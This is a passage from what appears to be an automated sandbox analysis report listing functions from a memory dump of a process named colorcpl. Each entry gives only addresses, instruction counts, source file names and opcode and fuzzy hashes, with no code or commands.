                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E663820 Relevance: .1, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8c800d68fdc7f6ccd6485f15652321481c4ae6c56211be90af6904b19e6dfe50
                                                                                                    • Instruction ID: c9d5995e88d3ce229a8351a501b6da99cdd8e22177170f8fd71fe2bb10f0b216
                                                                                                    • Opcode Fuzzy Hash: 8c800d68fdc7f6ccd6485f15652321481c4ae6c56211be90af6904b19e6dfe50
                                                                                                    • Instruction Fuzzy Hash: C3114974A54246DFD744CF19D480A89BBF5FB4D320F44825AE848CB301D735E880CFA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E629A40 Relevance: .1, Instructions: 52COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 54216382913283830c26bdc9664fbde62cdffc92f520da71175d48dce4df26c6
                                                                                                    • Instruction ID: 598cc9f5f8428558143640001a3ebb9c61238445ae60f1b78571e40408cb6b3d
                                                                                                    • Opcode Fuzzy Hash: 54216382913283830c26bdc9664fbde62cdffc92f520da71175d48dce4df26c6
                                                                                                    • Instruction Fuzzy Hash: AF01B5761423569BD3218A21C854E5677AEEB827A0FE88639E1154B250DB31EC01CBD4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E633C84 Relevance: .1, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2addcec82b7f710ec85a5ded4d2f8a2056ce6b7332473403804f9c4d44794082
                                                                                                    • Instruction ID: f9e50e541731f17682b46684a9c068e379553266e025114ab058225be390f711
                                                                                                    • Opcode Fuzzy Hash: 2addcec82b7f710ec85a5ded4d2f8a2056ce6b7332473403804f9c4d44794082
                                                                                                    • Instruction Fuzzy Hash: 68114876A52560DFCB29DF58CA50F6A73BAFF48704F96066CE405A7610C338BC00CB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EFB0C Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 42468f04d0c1cb0e876186dabc3726659f0a025b5bba9902a260be000c83a67c
                                                                                                    • Instruction ID: 4ea32c717b532c240849b6ae073c5443d7301c742adac15db37bb9993221ab3d
                                                                                                    • Opcode Fuzzy Hash: 42468f04d0c1cb0e876186dabc3726659f0a025b5bba9902a260be000c83a67c
                                                                                                    • Instruction Fuzzy Hash: 7F116D75E01249ABDB00DFA9D855E9EBBF8EF44740F40452AB904EB390D674EA00CB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EFA02 Relevance: .0, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: deb5439629bc585b0393ce640f2cdbde00b074e62b969b977dbfeb5fc7ef56e9
                                                                                                    • Instruction ID: 3dfe828ba4a6107fb4d4a1ad0e43433f510e0b31da8bfb7f2aee4855d15cb85e
                                                                                                    • Opcode Fuzzy Hash: deb5439629bc585b0393ce640f2cdbde00b074e62b969b977dbfeb5fc7ef56e9
                                                                                                    • Instruction Fuzzy Hash: E2019E75E12248EBDB04DFA9D845FAEBBB8EF44710F404566B800EB380D674EA01CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EFA87 Relevance: .0, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d3a190777f31f746ba4c301d59b630706065fabf0c552ebb82a8d90d3b0429b0
                                                                                                    • Instruction ID: 7bb176589e0725f6aa243352c21b49b52868c02008d812fa19cf0e46138cd9ce
                                                                                                    • Opcode Fuzzy Hash: d3a190777f31f746ba4c301d59b630706065fabf0c552ebb82a8d90d3b0429b0
                                                                                                    • Instruction Fuzzy Hash: F6019E75E02248EBDB04DFA9D845FAEBBB8EF44310F404526B800EB280D674EA41CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EF8F8 Relevance: .0, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 930e3a0456c6476e12cc124dd2febb077f4e9e478390080c322d028de7b83fb6
                                                                                                    • Instruction ID: 645343d908ed29319135c013b4b42be88c45f310af58eeffbbd7d31367cddb4c
                                                                                                    • Opcode Fuzzy Hash: 930e3a0456c6476e12cc124dd2febb077f4e9e478390080c322d028de7b83fb6
                                                                                                    • Instruction Fuzzy Hash: 6C019E75A02249ABDB04DFA9D855FAEBBB8EF44310F404526F940EB280D774EA00CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EF97D Relevance: .0, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b641b4d8e1eef0542eafe0424fa91bdef968f95fb79328bd9e3c3103a9d05c29
                                                                                                    • Instruction ID: 6259d01b06954266da1f16f80252c1a117aca2601178f1783d80064444650ba3
                                                                                                    • Opcode Fuzzy Hash: b641b4d8e1eef0542eafe0424fa91bdef968f95fb79328bd9e3c3103a9d05c29
                                                                                                    • Instruction Fuzzy Hash: C0019E75A02248ABDB04DFA9D845EAEBBB8EF44310F504566B940EB280D674EA01CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E663E8F Relevance: .0, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2d4d92f9d146c56f9ad3e78502a004861ace5efd1f0686b6c91f2a0b41a13872
                                                                                                    • Instruction ID: 96c8ad3e6dba2cb37d0d824969356e4c54c68f16222e9a920e69316467c09b71
                                                                                                    • Opcode Fuzzy Hash: 2d4d92f9d146c56f9ad3e78502a004861ace5efd1f0686b6c91f2a0b41a13872
                                                                                                    • Instruction Fuzzy Hash: 44018F769913518BC302DF7DC260552BBEAFBCE610B90071AD51AC7B15D232ED02CB64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EDEB0 Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 04e8f5beb4ff41848d123b01d94e2816ae296b421777b2303a20123720045dd8
                                                                                                    • Instruction ID: e67e30b2f4d26d182605aebfa1868f4ebbcfa3d5ae4239d343a6224fb70dc59d
                                                                                                    • Opcode Fuzzy Hash: 04e8f5beb4ff41848d123b01d94e2816ae296b421777b2303a20123720045dd8
                                                                                                    • Instruction Fuzzy Hash: 7501DB75E11248AFDB04DF69D855FAEB7B8EF45704F404126F900EB380DA74E901C799
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EDF2F Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e20f9b393ee626ba830bd373cf8dc78f37383390f302fa72f958922c690f612f
                                                                                                    • Instruction ID: 57bd6bf5e4e370f8d0d29a52ec8f1e9b034c9c7843e7deb19540e789e12472f1
                                                                                                    • Opcode Fuzzy Hash: e20f9b393ee626ba830bd373cf8dc78f37383390f302fa72f958922c690f612f
                                                                                                    • Instruction Fuzzy Hash: 5001D675E11248AFDB04DFA9D855FAEBBB8EF44704F404126F900EB380DA74EA01CB99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EDDC7 Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 15e1e395880b9be7c74cb36d9aed3ba330cdcc7d9d26ee38f50343dd833404a0
                                                                                                    • Instruction ID: 8421c024cb0dab937ce3923da923b095d8cd470ae91fa399a179e633055c6271
                                                                                                    • Opcode Fuzzy Hash: 15e1e395880b9be7c74cb36d9aed3ba330cdcc7d9d26ee38f50343dd833404a0
                                                                                                    • Instruction Fuzzy Hash: BA01D675E11248AFDB14DFA9D845FAEBBB8EF44704F404526F900EB380DA74E901CB99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EF80A Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b9454c5c7bc271a3fdf1fa86107cdd00d7bcdb8be6c65ee248e2ecd5fbf9c7a1
                                                                                                    • Instruction ID: 73b2207505a548f355ed4794246c26bf2e3e9194ea3446d38c93c724564542a5
                                                                                                    • Opcode Fuzzy Hash: b9454c5c7bc271a3fdf1fa86107cdd00d7bcdb8be6c65ee248e2ecd5fbf9c7a1
                                                                                                    • Instruction Fuzzy Hash: 7201F275E11258EBDB00DBA9D805FAFBBB8EF44700F80456AF400EB280DB74E900C794
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E64DE2D Relevance: .0, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 368e61ba87865aa19346178b7844ae674ffcdb5df96dd9dd0ad9eec9e280710d
                                                                                                    • Instruction ID: 71066cf2eb30cf9a228c930de16fc5b730c938ed6547f62992364484bfd458c7
                                                                                                    • Opcode Fuzzy Hash: 368e61ba87865aa19346178b7844ae674ffcdb5df96dd9dd0ad9eec9e280710d
                                                                                                    • Instruction Fuzzy Hash: D4014C38A041D19FD7128B118964BF93BEAAB27754FF807E4E9609B5E1D728CD40C720
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E705636 Relevance: .0, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6cac7cf2dc45eb6968bfde9e0f7b0400c5ca3bbfd089480c8575668b1f5994d7
                                                                                                    • Instruction ID: ae7c61003be63bcdf3e3cba8af0e931b4c6e8a8c77625ceb256413e798d3b4d2
                                                                                                    • Opcode Fuzzy Hash: 6cac7cf2dc45eb6968bfde9e0f7b0400c5ca3bbfd089480c8575668b1f5994d7
                                                                                                    • Instruction Fuzzy Hash: 8E11AD78D00249EBDB00DFA8C440A9EB7B8EF08704F10845AA800EB350D730EA02CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6F972B Relevance: .0, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                    • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                                                    • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                    • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E665734 Relevance: .0, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                    • Instruction ID: cfeb9a00e190ef754d15c3bdee99beec8d8bd74a82eb77bff3fa9bd6948110b3
                                                                                                    • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                    • Instruction Fuzzy Hash: 56F0FF72A21214BFE309CF5CC841F5ABBEEEB4A650F014279D500DF231E671EE04CA94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6BD820 Relevance: .0, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 64789c6ddbead33302fac3212ecdc079511659893230da43a9a81759dace1cf8
                                                                                                    • Instruction ID: de745a2eae4c0274d32863e72937c12410a2d992c8636a1780f53ffdf5c16554
                                                                                                    • Opcode Fuzzy Hash: 64789c6ddbead33302fac3212ecdc079511659893230da43a9a81759dace1cf8
                                                                                                    • Instruction Fuzzy Hash: 39F0FF3A7421D06ADB2527A18D24F2A372ADBD5BA1FE00E38B6004F6A0DB14AC00C34C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E631E30 Relevance: .0, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b9a720d99e092428df2c9411d9c4715118aa9b165e762b3b3b92662b8f60105c
                                                                                                    • Instruction ID: d497484891db3e009b0684590bf022850389d3d55e8b6e8419ce9098c5564800
                                                                                                    • Opcode Fuzzy Hash: b9a720d99e092428df2c9411d9c4715118aa9b165e762b3b3b92662b8f60105c
                                                                                                    • Instruction Fuzzy Hash: 8F014436A11688EFE710CB44CC08F4A33E8DB12F21FA08743EC289B290D735EC408785
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EF889 Relevance: .0, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6c5558550ec265d813efd806e32b6cd256fdf6c6e665e2175b5cb3775afe045d
                                                                                                    • Instruction ID: 85023f3854314e6ef0d506650d17490abe5bf74b41be954bb5e642e02edec934
                                                                                                    • Opcode Fuzzy Hash: 6c5558550ec265d813efd806e32b6cd256fdf6c6e665e2175b5cb3775afe045d
                                                                                                    • Instruction Fuzzy Hash: EBF0C836E1124CABDB04DBB9C905AEEB7B8EF45710F40855AF501F72C0DA74E9018B95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E627967 Relevance: .0, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4591191befd7c5beb4969d763fd59f5eb86e9bd1e44db9431eda3793a83f3aea
                                                                                                    • Instruction ID: 501e1f9f829e48c40fc033499bf69d04d20fac25180e6459284f42fddc405d5b
                                                                                                    • Opcode Fuzzy Hash: 4591191befd7c5beb4969d763fd59f5eb86e9bd1e44db9431eda3793a83f3aea
                                                                                                    • Instruction Fuzzy Hash: FEF03C76B02214ABDB15DA59C940FAE77BEDF89700F940269A901A7280DB74BE01CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EDE46 Relevance: .0, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8a8d0794c21b666e36e0dc79bb50e3d066cc9739cc40bb011b89da3e269756a6
                                                                                                    • Instruction ID: e600632cf89d79db362bcfb4bcd2e04a9653055b73be8337fad12e4070b9898d
                                                                                                    • Opcode Fuzzy Hash: 8a8d0794c21b666e36e0dc79bb50e3d066cc9739cc40bb011b89da3e269756a6
                                                                                                    • Instruction Fuzzy Hash: D2F0F635B11248ABDB04DBB9C915E7EB3B8EF55700F804569F501EB6D0EA70E901C755
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E65FEC0 Relevance: .0, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b0c9e1138bf08bfd7576430339e0cbf29eabd9c0b51781b0a2b60c8ef6cb374a
                                                                                                    • Instruction ID: bf0f4b508e0e0f48315462b591650e665b1cc6c248d30a5b5539880f4124e682
                                                                                                    • Opcode Fuzzy Hash: b0c9e1138bf08bfd7576430339e0cbf29eabd9c0b51781b0a2b60c8ef6cb374a
                                                                                                    • Instruction Fuzzy Hash: EDF0B477B0316157D2308B9CE850B6A3368EBCAF61F610739F941DB740E714E8019A94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E703B10 Relevance: .0, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 939d35e01c02f87bdc7d116ee6a10a3add43fdf3b6bd4552ab9fa976b7bf1466
                                                                                                    • Instruction ID: 8ccf70e5592a70f0c9c9d55e3f8637098f3a95fd522474525a0c868bf7738559
                                                                                                    • Opcode Fuzzy Hash: 939d35e01c02f87bdc7d116ee6a10a3add43fdf3b6bd4552ab9fa976b7bf1466
                                                                                                    • Instruction Fuzzy Hash: 09F0C837100744AFE7119A69D840F93B7EEBFC2B04F414A19E64687554DB74F441CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E703749 Relevance: .0, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                                    • Instruction ID: 7acc4444c0a11a48f1b23ad720524682fb7018f27101083bca04be7f36591a25
                                                                                                    • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                                    • Instruction Fuzzy Hash: 2EF04FBA940244BFE711DBA4CD41FDB77FCEB04714F100666A955D6190EA70AA44CB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62FD80 Relevance: .0, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a174de0e20a84e4e462ad37a34075d61457da5c0f2ce69c74170702235a7cc26
                                                                                                    • Instruction ID: cea94f240d8d22a9207f5c61aa7f6b7902b8a7add44b167956054de82770327b
                                                                                                    • Opcode Fuzzy Hash: a174de0e20a84e4e462ad37a34075d61457da5c0f2ce69c74170702235a7cc26
                                                                                                    • Instruction Fuzzy Hash: 8DF05937A221B25BE3309B4AE980986B738F7DD752BE00F7BE18197150F7605481CF98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E65D978 Relevance: .0, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3e4de2a8b15d4e0d56af53cdbb9d7e24bab17acf61d511c0d7f7dd5f5a89532f
                                                                                                    • Instruction ID: 2c2216692ee902bf63e81cb7d62ce6791c08c678ce243656e859dcd766b6df61
                                                                                                    • Opcode Fuzzy Hash: 3e4de2a8b15d4e0d56af53cdbb9d7e24bab17acf61d511c0d7f7dd5f5a89532f
                                                                                                    • Instruction Fuzzy Hash: 20F09632A1AB50DBD3318E16C840917B7F5FFD2AA0B860B699C99537D0D760B805C7D1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62BFD0 Relevance: .0, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 61a05f2e583a7f8459c8a446ac862a951a5c744327d893a3cbcb345d9d0b580d
